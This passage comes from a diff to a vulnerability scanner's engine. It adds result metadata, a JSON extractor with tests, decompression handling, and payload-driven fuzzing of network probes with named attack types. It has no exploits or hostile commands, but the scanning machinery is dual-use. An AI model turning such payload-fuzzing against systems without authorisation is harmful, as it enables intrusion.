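The headless engine above switches from go-ps to gopsutil and snapshots the Chrome/Chromium PIDs that were already running before launch, so that only browser processes spawned afterwards are killed on Close. A minimal sketch of that snapshot-and-reap pattern, restricted to the gopsutil calls already present in the hunk (Processes, Name, Pid, Kill); matching on the process name only is a simplification:

```go
package main

import (
	"fmt"
	"strings"

	"github.com/shirou/gopsutil/v3/process"
)

// isChrome loosely matches chrome/chromium by process name.
func isChrome(p *process.Process) bool {
	name, _ := p.Name()
	return strings.Contains(name, "chrome") || strings.Contains(name, "chromium")
}

// snapshotChrome records the PIDs of chrome/chromium processes already running.
func snapshotChrome() map[int32]struct{} {
	seen := make(map[int32]struct{})
	procs, _ := process.Processes()
	for _, p := range procs {
		if isChrome(p) {
			seen[p.Pid] = struct{}{}
		}
	}
	return seen
}

// killNewChrome kills chrome/chromium processes that are not in the snapshot.
func killNewChrome(before map[int32]struct{}) {
	procs, _ := process.Processes()
	for _, p := range procs {
		if !isChrome(p) {
			continue
		}
		if _, ok := before[p.Pid]; ok {
			continue // was already running before the browser launch
		}
		_ = p.Kill()
	}
}

func main() {
	before := snapshotChrome()
	fmt.Println("chrome/chromium processes before launch:", len(before))
	// ... launch a headless browser and run page actions here ...
	killNewChrome(before)
}
```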
data, err := createdPage.ExecuteActions(baseURL, actions) if err != nil { diff --git a/v2/pkg/protocols/headless/engine/page_actions_test.go b/v2/pkg/protocols/headless/engine/page_actions_test.go index e89fe53542..658c329081 100644 --- a/v2/pkg/protocols/headless/engine/page_actions_test.go +++ b/v2/pkg/protocols/headless/engine/page_actions_test.go @@ -23,6 +23,7 @@ func TestActionNavigate(t *testing.T) { instance, err := browser.NewInstance() require.Nil(t, err, "could not create browser instance") + defer instance.Close() ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { fmt.Fprintln(w, ` diff --git a/v2/pkg/protocols/headless/operators.go b/v2/pkg/protocols/headless/operators.go index f1845a89e5..265dc95d72 100644 --- a/v2/pkg/protocols/headless/operators.go +++ b/v2/pkg/protocols/headless/operators.go @@ -72,6 +72,7 @@ func (r *Request) responseToDSLMap(resp, req, host, matched string) output.Inter data["data"] = resp data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -106,6 +107,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "headless", Host: types.ToString(wrapped.InternalEvent["host"]), diff --git a/v2/pkg/protocols/http/cluster.go b/v2/pkg/protocols/http/cluster.go index 68107c9ebd..bdfa073586 100644 --- a/v2/pkg/protocols/http/cluster.go +++ b/v2/pkg/protocols/http/cluster.go @@ -10,7 +10,7 @@ import ( // are similar enough to be considered one and can be checked by // just adding the matcher/extractors for the request and the correct IDs. 
func (r *Request) CanCluster(other *Request) bool { - if len(r.Payloads) > 0 || len(r.Raw) > 0 || len(r.Body) > 0 || r.Unsafe { + if len(r.Payloads) > 0 || len(r.Raw) > 0 || len(r.Body) > 0 || r.Unsafe || r.ReqCondition || r.Name != "" { return false } if r.Method != other.Method || diff --git a/v2/pkg/protocols/http/http.go b/v2/pkg/protocols/http/http.go index 2f8c4212cf..ecd297f8d7 100644 --- a/v2/pkg/protocols/http/http.go +++ b/v2/pkg/protocols/http/http.go @@ -111,7 +111,7 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { r.Raw[i] = strings.ReplaceAll(raw, "\n", "\r\n") } } - r.rawhttpClient = httpclientpool.GetRawHTTP() + r.rawhttpClient = httpclientpool.GetRawHTTP(options.Options) } if len(r.Matchers) > 0 || len(r.Extractors) > 0 { compiled := &r.Operators diff --git a/v2/pkg/protocols/http/httpclientpool/clientpool.go b/v2/pkg/protocols/http/httpclientpool/clientpool.go index 67ecfe7461..8d0057fa84 100644 --- a/v2/pkg/protocols/http/httpclientpool/clientpool.go +++ b/v2/pkg/protocols/http/httpclientpool/clientpool.go @@ -24,7 +24,9 @@ import ( ) var ( - Dialer *fastdialer.Dialer + // Dialer is a copy of the fastdialer from protocolstate + Dialer *fastdialer.Dialer + rawhttpClient *rawhttp.Client poolMutex *sync.RWMutex normalClient *retryablehttp.Client @@ -77,9 +79,11 @@ func (c *Configuration) Hash() string { } // GetRawHTTP returns the rawhttp request client -func GetRawHTTP() *rawhttp.Client { +func GetRawHTTP(options *types.Options) *rawhttp.Client { if rawhttpClient == nil { - rawhttpClient = rawhttp.NewClient(rawhttp.DefaultOptions) + rawhttpOptions := rawhttp.DefaultOptions + rawhttpOptions.Timeout = time.Duration(options.Timeout) * time.Second + rawhttpClient = rawhttp.NewClient(rawhttpOptions) } return rawhttpClient } @@ -92,7 +96,7 @@ func Get(options *types.Options, configuration *Configuration) (*retryablehttp.C return wrappedGet(options, configuration) } -// wrappedGet wraps a get operation without normal cliet check +// wrappedGet wraps a get operation without normal client check func wrappedGet(options *types.Options, configuration *Configuration) (*retryablehttp.Client, error) { var proxyURL *url.URL var err error @@ -100,9 +104,6 @@ func wrappedGet(options *types.Options, configuration *Configuration) (*retryabl if Dialer == nil { Dialer = protocolstate.Dialer } - if err != nil { - return nil, errors.Wrap(err, "could not create dialer") - } hash := configuration.Hash() poolMutex.RLock() diff --git a/v2/pkg/protocols/http/operators.go b/v2/pkg/protocols/http/operators.go index 0c1fcb9956..ba6f9a6cdf 100644 --- a/v2/pkg/protocols/http/operators.go +++ b/v2/pkg/protocols/http/operators.go @@ -54,6 +54,8 @@ func (r *Request) Extract(data map[string]interface{}, extractor *extractors.Ext return extractor.ExtractRegex(item) case extractors.KValExtractor: return extractor.ExtractKval(data) + case extractors.JSONExtractor: + return extractor.ExtractJSON(item) } return nil } @@ -105,14 +107,16 @@ func (r *Request) responseToDSLMap(resp *http.Response, host, matched, rawReq, r data["duration"] = duration.Seconds() data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } // MakeResultEvent creates a result event from internal wrapped event func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*output.ResultEvent { - if len(wrapped.OperatorsResult.DynamicValues) > 0 { + if len(wrapped.OperatorsResult.DynamicValues) > 0 && 
!wrapped.OperatorsResult.Matched { return nil } + results := make([]*output.ResultEvent, 0, len(wrapped.OperatorsResult.Matches)+1) // If we have multiple matchers with names, write each of them separately. @@ -139,6 +143,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "http", Host: types.ToString(wrapped.InternalEvent["host"]), diff --git a/v2/pkg/protocols/http/operators_test.go b/v2/pkg/protocols/http/operators_test.go index ccddc7b5d3..7328fce867 100644 --- a/v2/pkg/protocols/http/operators_test.go +++ b/v2/pkg/protocols/http/operators_test.go @@ -38,7 +38,7 @@ func TestResponseToDSLMap(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") } @@ -68,7 +68,7 @@ func TestHTTPOperatorMatch(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") @@ -138,7 +138,7 @@ func TestHTTPOperatorExtract(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test_header"], "could not get correct resp for header") @@ -168,6 +168,47 @@ func TestHTTPOperatorExtract(t *testing.T) { require.Greater(t, len(data), 0, "could not extractor kval valid response") require.Equal(t, map[string]struct{}{"Test-Response": {}}, data, "could not extract correct kval data") }) + + t.Run("json", func(t *testing.T) { + event["body"] = exampleJSONResponseBody + + t.Run("jq-simple", func(t *testing.T) { + extractor := &extractors.Extractor{ + Type: "json", + JSON: []string{".batters | .batter | .[] | .id"}, + } + err = extractor.CompileExtractors() + require.Nil(t, err, "could not compile json extractor") + + data := request.Extract(event, extractor) + require.Greater(t, len(data), 0, "could not extractor json valid response") + require.Equal(t, 
map[string]struct{}{"1001": {}, "1002": {}, "1003": {}, "1004": {}}, data, "could not extract correct json data") + }) + t.Run("jq-array", func(t *testing.T) { + extractor := &extractors.Extractor{ + Type: "json", + JSON: []string{".array"}, + } + err = extractor.CompileExtractors() + require.Nil(t, err, "could not compile json extractor") + + data := request.Extract(event, extractor) + require.Greater(t, len(data), 0, "could not extractor json valid response") + require.Equal(t, map[string]struct{}{"[\"hello\",\"world\"]": {}}, data, "could not extract correct json data") + }) + t.Run("jq-object", func(t *testing.T) { + extractor := &extractors.Extractor{ + Type: "json", + JSON: []string{".batters"}, + } + err = extractor.CompileExtractors() + require.Nil(t, err, "could not compile json extractor") + + data := request.Extract(event, extractor) + require.Greater(t, len(data), 0, "could not extractor json valid response") + require.Equal(t, map[string]struct{}{"{\"batter\":[{\"id\":\"1001\",\"type\":\"Regular\"},{\"id\":\"1002\",\"type\":\"Chocolate\"},{\"id\":\"1003\",\"type\":\"Blueberry\"},{\"id\":\"1004\",\"type\":\"Devil's Food\"}]}": {}}, data, "could not extract correct json data") + }) + }) } func TestHTTPMakeResult(t *testing.T) { @@ -208,7 +249,7 @@ func TestHTTPMakeResult(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") @@ -305,3 +346,63 @@ const exampleResponseBody = ` ` + +const exampleJSONResponseBody = ` +{ + "id": "0001", + "type": "donut", + "name": "Cake", + "ppu": 0.55, + "array": ["hello", "world"], + "batters": { + "batter": [ + { + "id": "1001", + "type": "Regular" + }, + { + "id": "1002", + "type": "Chocolate" + }, + { + "id": "1003", + "type": "Blueberry" + }, + { + "id": "1004", + "type": "Devil's Food" + } + ] + }, + "topping": [ + { + "id": "5001", + "type": "None" + }, + { + "id": "5002", + "type": "Glazed" + }, + { + "id": "5005", + "type": "Sugar" + }, + { + "id": "5007", + "type": "Powdered Sugar" + }, + { + "id": "5006", + "type": "Chocolate with Sprinkles" + }, + { + "id": "5003", + "type": "Chocolate" + }, + { + "id": "5004", + "type": "Maple" + } + ] +} +` diff --git a/v2/pkg/protocols/http/request.go b/v2/pkg/protocols/http/request.go index 6ce71d7baf..0ece585a98 100644 --- a/v2/pkg/protocols/http/request.go +++ b/v2/pkg/protocols/http/request.go @@ -21,6 +21,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/tostring" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/httpclientpool" "github.com/projectdiscovery/rawhttp" + "github.com/projectdiscovery/stringsutil" "github.com/remeh/sizedwaitgroup" "go.uber.org/multierr" ) @@ -81,7 +82,7 @@ func (r *Request) executeRaceRequest(reqURL string, previous output.InternalEven } // executeRaceRequest executes parallel requests for a template -func (r *Request) executeParallelHTTP(reqURL string, dynamicValues, previous output.InternalEvent, callback protocols.OutputEventCallback) error { +func (r *Request) executeParallelHTTP(reqURL string, dynamicValues 
output.InternalEvent, callback protocols.OutputEventCallback) error { generator := r.newGenerator() // Workers that keeps enqueuing new requests @@ -104,6 +105,8 @@ func (r *Request) executeParallelHTTP(reqURL string, dynamicValues, previous out defer swg.Done() r.options.RateLimiter.Take() + + previous := make(map[string]interface{}) err := r.executeRequest(reqURL, httpRequest, previous, callback, 0) mutex.Lock() if err != nil { @@ -117,7 +120,7 @@ func (r *Request) executeParallelHTTP(reqURL string, dynamicValues, previous out return requestErr } -// executeRaceRequest executes turbo http request for a URL +// executeTurboHTTP executes turbo http request for a URL func (r *Request) executeTurboHTTP(reqURL string, dynamicValues, previous output.InternalEvent, callback protocols.OutputEventCallback) error { generator := r.newGenerator() @@ -190,7 +193,7 @@ func (r *Request) ExecuteWithResults(reqURL string, dynamicValues, previous outp // verify if parallel elaboration was requested if r.Threads > 0 { - return r.executeParallelHTTP(reqURL, dynamicValues, previous, callback) + return r.executeParallelHTTP(reqURL, dynamicValues, callback) } generator := r.newGenerator() @@ -229,8 +232,9 @@ func (r *Request) ExecuteWithResults(reqURL string, dynamicValues, previous outp MatchFunc: r.Match, ExtractFunc: r.Extract, }) + } else { + callback(event) } - callback(event) }, requestCount) if err != nil { requestErr = multierr.Append(requestErr, err) @@ -259,28 +263,19 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ err error ) - // For race conditions we can't dump the request body at this point as it's already waiting the open-gate event, already handled with a similar code within the race function - if !request.original.Race { - dumpedRequest, err = dump(request, reqURL) - if err != nil { - return err - } - - if r.options.Options.Debug || r.options.Options.DebugRequests { - gologger.Info().Msgf("[%s] Dumped HTTP request for %s\n\n", r.options.TemplateID, reqURL) - gologger.Print().Msgf("%s", string(dumpedRequest)) - } - } - var formedURL string var hostname string timeStart := time.Now() if request.original.Pipeline { - formedURL = request.rawRequest.FullURL - if parsed, parseErr := url.Parse(formedURL); parseErr == nil { - hostname = parsed.Host + if request.rawRequest != nil { + formedURL = request.rawRequest.FullURL + if parsed, parseErr := url.Parse(formedURL); parseErr == nil { + hostname = parsed.Host + } + resp, err = request.pipelinedClient.DoRaw(request.rawRequest.Method, reqURL, request.rawRequest.Path, generators.ExpandMapValues(request.rawRequest.Headers), ioutil.NopCloser(strings.NewReader(request.rawRequest.Data))) + } else if request.request != nil { + resp, err = request.pipelinedClient.Dor(request.request) } - resp, err = request.pipelinedClient.DoRaw(request.rawRequest.Method, reqURL, request.rawRequest.Path, generators.ExpandMapValues(request.rawRequest.Headers), ioutil.NopCloser(strings.NewReader(request.rawRequest.Data))) } else if request.original.Unsafe && request.rawRequest != nil { formedURL = request.rawRequest.FullURL if parsed, parseErr := url.Parse(formedURL); parseErr == nil { @@ -306,6 +301,20 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ resp, err = r.httpClient.Do(request.request) } } + + // For race conditions we can't dump the request body at this point as it's already waiting the open-gate event, already handled with a similar code within the race function + if !request.original.Race { + 
dumpedRequest, err = dump(request, reqURL) + if err != nil { + return err + } + + if r.options.Options.Debug || r.options.Options.DebugRequests { + gologger.Info().Msgf("[%s] Dumped HTTP request for %s\n\n", r.options.TemplateID, reqURL) + gologger.Print().Msgf("%s", string(dumpedRequest)) + } + } + if resp == nil { err = errors.New("no response got for request") } @@ -342,7 +351,12 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ } data, err := ioutil.ReadAll(bodyReader) if err != nil { - return errors.Wrap(err, "could not read http body") + // Ignore body read due to server misconfiguration errors + if stringsutil.ContainsAny(err.Error(), "gzip: invalid header") { + gologger.Warning().Msgf("[%s] Server sent an invalid gzip header and it was not possible to read the uncompressed body for %s: %s", r.options.TemplateID, formedURL, err.Error()) + } else if !stringsutil.ContainsAny(err.Error(), "unexpected EOF") { // ignore EOF error + return errors.Wrap(err, "could not read http body") + } } resp.Body.Close() @@ -355,7 +369,11 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ // encoding has been specified by the user in the request so in case we have to // manually do it. dataOrig := data - data, _ = handleDecompression(resp, data) + data, err = handleDecompression(resp, data) + // in case of error use original data + if err != nil { + data = dataOrig + } // Dump response - step 2 - replace gzip body with deflated one or with itself (NOP operation) dumpedResponseBuilder := &bytes.Buffer{} @@ -409,16 +427,14 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ } event := &output.InternalWrappedEvent{InternalEvent: outputEvent} - if !interactsh.HasMatchers(r.CompiledOperators) { - if r.CompiledOperators != nil { - var ok bool - event.OperatorsResult, ok = r.CompiledOperators.Execute(finalEvent, r.Match, r.Extract) - if ok && event.OperatorsResult != nil { - event.OperatorsResult.PayloadValues = request.meta - event.Results = r.MakeResultEvent(event) - } - event.InternalEvent = outputEvent + if r.CompiledOperators != nil { + var ok bool + event.OperatorsResult, ok = r.CompiledOperators.Execute(finalEvent, r.Match, r.Extract) + if ok && event.OperatorsResult != nil { + event.OperatorsResult.PayloadValues = request.meta + event.Results = r.MakeResultEvent(event) } + event.InternalEvent = outputEvent } callback(event) return nil diff --git a/v2/pkg/protocols/http/utils.go b/v2/pkg/protocols/http/utils.go index fa9747097d..95a27e7ef5 100644 --- a/v2/pkg/protocols/http/utils.go +++ b/v2/pkg/protocols/http/utils.go @@ -3,6 +3,8 @@ package http import ( "bytes" "compress/gzip" + "compress/zlib" + "io" "io/ioutil" "net/http" "net/http/httputil" @@ -100,19 +102,23 @@ func handleDecompression(resp *http.Response, bodyOrig []byte) (bodyDec []byte, return bodyOrig, nil } - encodingHeader := strings.TrimSpace(strings.ToLower(resp.Header.Get("Content-Encoding"))) - if strings.Contains(encodingHeader, "gzip") { - gzipreader, err := gzip.NewReader(bytes.NewReader(bodyOrig)) - if err != nil { - return bodyOrig, err - } - defer gzipreader.Close() + var reader io.ReadCloser + switch resp.Header.Get("Content-Encoding") { + case "gzip": + reader, err = gzip.NewReader(bytes.NewReader(bodyOrig)) + case "deflate": + reader, err = zlib.NewReader(bytes.NewReader(bodyOrig)) + default: + return bodyOrig, nil + } + if err != nil { + return nil, err + } + defer reader.Close() - bodyDec, err = ioutil.ReadAll(gzipreader) - if 
err != nil { - return bodyOrig, err - } - return bodyDec, nil + bodyDec, err = ioutil.ReadAll(reader) + if err != nil { + return bodyOrig, err } - return bodyOrig, nil + return bodyDec, nil } diff --git a/v2/pkg/protocols/network/network.go b/v2/pkg/protocols/network/network.go index a0dd61cad1..196fcbcde3 100644 --- a/v2/pkg/protocols/network/network.go +++ b/v2/pkg/protocols/network/network.go @@ -9,6 +9,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/operators" "github.com/projectdiscovery/nuclei/v2/pkg/protocols" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/generators" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/network/networkclientpool" ) @@ -20,6 +21,12 @@ type Request struct { Address []string `yaml:"host"` addresses []addressKV + // AttackType is the attack type + // Sniper, PitchFork and ClusterBomb. Default is Sniper + AttackType string `yaml:"attack"` + // Path contains the path/s for the request variables + Payloads map[string]interface{} `yaml:"payloads"` + // Payload is the payload to send for the network request Inputs []*Input `yaml:"inputs"` // ReadSize is the size of response to read (1024 if not provided by default) @@ -29,6 +36,8 @@ type Request struct { operators.Operators `yaml:",inline,omitempty"` CompiledOperators *operators.Operators + generator *generators.Generator + attackType generators.Type // cache any variables that may be needed for operation. dialer *fastdialer.Dialer options *protocols.ExecuterOptions @@ -62,6 +71,7 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { var shouldUseTLS bool var err error + r.options = options for _, address := range r.Address { // check if the connection should be encrypted if strings.HasPrefix(address, "tls://") { @@ -88,6 +98,30 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { } } + if len(r.Payloads) > 0 { + attackType := r.AttackType + if attackType == "" { + attackType = "sniper" + } + r.attackType = generators.StringToType[attackType] + + // Resolve payload paths if they are files. + for name, payload := range r.Payloads { + payloadStr, ok := payload.(string) + if ok { + final, resolveErr := options.Catalog.ResolvePath(payloadStr, options.TemplatePath) + if resolveErr != nil { + return errors.Wrap(resolveErr, "could not read payload file") + } + r.Payloads[name] = final + } + } + r.generator, err = generators.New(r.Payloads, r.attackType, r.options.TemplatePath) + if err != nil { + return errors.Wrap(err, "could not parse payloads") + } + } + // Create a client for the class client, err := networkclientpool.Get(options.Options, &networkclientpool.Configuration{}) if err != nil { @@ -102,7 +136,6 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { } r.CompiledOperators = compiled } - r.options = options return nil } diff --git a/v2/pkg/protocols/network/operators.go b/v2/pkg/protocols/network/operators.go index a0a95ede99..e056ca96b8 100644 --- a/v2/pkg/protocols/network/operators.go +++ b/v2/pkg/protocols/network/operators.go @@ -73,6 +73,7 @@ func (r *Request) responseToDSLMap(req, resp, raw, host, matched string) output. 
data["raw"] = raw // Raw is the full transaction data for network data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -107,11 +108,13 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "network", Host: types.ToString(wrapped.InternalEvent["host"]), Matched: types.ToString(wrapped.InternalEvent["matched"]), ExtractedResults: wrapped.OperatorsResult.OutputExtracts, + Metadata: wrapped.OperatorsResult.PayloadValues, Timestamp: time.Now(), IP: types.ToString(wrapped.InternalEvent["ip"]), } diff --git a/v2/pkg/protocols/network/operators_test.go b/v2/pkg/protocols/network/operators_test.go index e729c777e6..a8b64ddd1a 100644 --- a/v2/pkg/protocols/network/operators_test.go +++ b/v2/pkg/protocols/network/operators_test.go @@ -32,7 +32,7 @@ func TestResponseToDSLMap(t *testing.T) { req := "test-data\r\n" resp := "resp-data\r\n" event := request.responseToDSLMap(req, resp, "test", "one.one.one.one", "one.one.one.one") - require.Len(t, event, 7, "could not get correct number of items in dsl map") + require.Len(t, event, 8, "could not get correct number of items in dsl map") require.Equal(t, resp, event["data"], "could not get correct resp") } diff --git a/v2/pkg/protocols/network/request.go b/v2/pkg/protocols/network/request.go index 7db9fca965..98f9e744d5 100644 --- a/v2/pkg/protocols/network/request.go +++ b/v2/pkg/protocols/network/request.go @@ -13,6 +13,7 @@ import ( "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/protocols" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/replacer" ) @@ -55,6 +56,28 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse return err } + if r.generator != nil { + iterator := r.generator.NewIterator() + + for { + value, ok := iterator.Value() + if !ok { + break + } + if err := r.executeRequestWithPayloads(actualAddress, address, input, shouldUseTLS, value, previous, callback); err != nil { + return err + } + } + } else { + value := make(map[string]interface{}) + if err := r.executeRequestWithPayloads(actualAddress, address, input, shouldUseTLS, value, previous, callback); err != nil { + return err + } + } + return nil +} + +func (r *Request) executeRequestWithPayloads(actualAddress, address, input string, shouldUseTLS bool, payloads map[string]interface{}, previous output.InternalEvent, callback protocols.OutputEventCallback) error { var ( hostname string conn net.Conn @@ -106,9 +129,16 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse return errors.Wrap(err, "could not write request to server") } reqBuilder.Grow(len(input.Data)) - reqBuilder.WriteString(input.Data) - _, err = conn.Write(data) + finalData, dataErr := expressions.EvaluateByte(data, payloads) + if dataErr != nil { + r.options.Output.Request(r.options.TemplateID, address, "network", dataErr) + 
r.options.Progress.IncrementFailedRequestsBy(1) + return errors.Wrap(dataErr, "could not evaluate template expressions") + } + reqBuilder.Write(finalData) + + _, err = conn.Write(finalData) if err != nil { r.options.Output.Request(r.options.TemplateID, address, "network", err) r.options.Progress.IncrementFailedRequestsBy(1) @@ -119,16 +149,27 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse buffer := make([]byte, input.Read) n, _ := conn.Read(buffer) responseBuilder.Write(buffer[:n]) + + bufferStr := string(buffer[:n]) if input.Name != "" { - inputEvents[input.Name] = string(buffer[:n]) + inputEvents[input.Name] = bufferStr + } + + // Run any internal extractors for the request here and add found values to map. + if r.CompiledOperators != nil { + values := r.CompiledOperators.ExecuteInternalExtractors(map[string]interface{}{input.Name: bufferStr}, r.Extract) + for k, v := range values { + payloads[k] = v + } } } } r.options.Progress.IncrementRequests() if r.options.Options.Debug || r.options.Options.DebugRequests { + requestOutput := reqBuilder.String() gologger.Info().Str("address", actualAddress).Msgf("[%s] Dumped Network request for %s", r.options.TemplateID, actualAddress) - gologger.Print().Msgf("%s", reqBuilder.String()) + gologger.Print().Msgf("%s\nHex: %s", requestOutput, hex.EncodeToString([]byte(requestOutput))) } r.options.Output.Request(r.options.TemplateID, actualAddress, "network", err) @@ -147,39 +188,42 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse responseBuilder.Write(final[:n]) if r.options.Options.Debug || r.options.Options.DebugResponse { + responseOutput := responseBuilder.String() gologger.Debug().Msgf("[%s] Dumped Network response for %s", r.options.TemplateID, actualAddress) - gologger.Print().Msgf("%s", responseBuilder.String()) + gologger.Print().Msgf("%s\nHex: %s", responseOutput, hex.EncodeToString([]byte(responseOutput))) } outputEvent := r.responseToDSLMap(reqBuilder.String(), string(final[:n]), responseBuilder.String(), input, actualAddress) outputEvent["ip"] = r.dialer.GetDialedIP(hostname) for k, v := range previous { outputEvent[k] = v } + for k, v := range payloads { + outputEvent[k] = v + } for k, v := range inputEvents { outputEvent[k] = v } event := &output.InternalWrappedEvent{InternalEvent: outputEvent} - if !hasInteractMarkers { + if interactURL == "" { if r.CompiledOperators != nil { result, ok := r.CompiledOperators.Execute(outputEvent, r.Match, r.Extract) if ok && result != nil { event.OperatorsResult = result + event.OperatorsResult.PayloadValues = payloads event.Results = r.MakeResultEvent(event) } } - } else { - if r.options.Interactsh != nil { - r.options.Interactsh.RequestEvent(interactURL, &interactsh.RequestData{ - MakeResultFunc: r.MakeResultEvent, - Event: event, - Operators: r.CompiledOperators, - MatchFunc: r.Match, - ExtractFunc: r.Extract, - }) - } + callback(event) + } else if r.options.Interactsh != nil { + r.options.Interactsh.RequestEvent(interactURL, &interactsh.RequestData{ + MakeResultFunc: r.MakeResultEvent, + Event: event, + Operators: r.CompiledOperators, + MatchFunc: r.Match, + ExtractFunc: r.Extract, + }) } - callback(event) return nil } diff --git a/v2/pkg/protocols/offlinehttp/operators.go b/v2/pkg/protocols/offlinehttp/operators.go index c71376c991..d60cf72f82 100644 --- a/v2/pkg/protocols/offlinehttp/operators.go +++ b/v2/pkg/protocols/offlinehttp/operators.go @@ -101,6 +101,7 @@ func (r *Request) responseToDSLMap(resp *http.Response, host, 
matched, rawReq, r data["duration"] = duration.Seconds() data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -135,6 +136,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "http", Path: types.ToString(wrapped.InternalEvent["path"]), diff --git a/v2/pkg/protocols/offlinehttp/operators_test.go b/v2/pkg/protocols/offlinehttp/operators_test.go index c685315c56..f557317163 100644 --- a/v2/pkg/protocols/offlinehttp/operators_test.go +++ b/v2/pkg/protocols/offlinehttp/operators_test.go @@ -34,7 +34,7 @@ func TestResponseToDSLMap(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") } @@ -60,7 +60,7 @@ func TestHTTPOperatorMatch(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") @@ -126,7 +126,7 @@ func TestHTTPOperatorExtract(t *testing.T) { 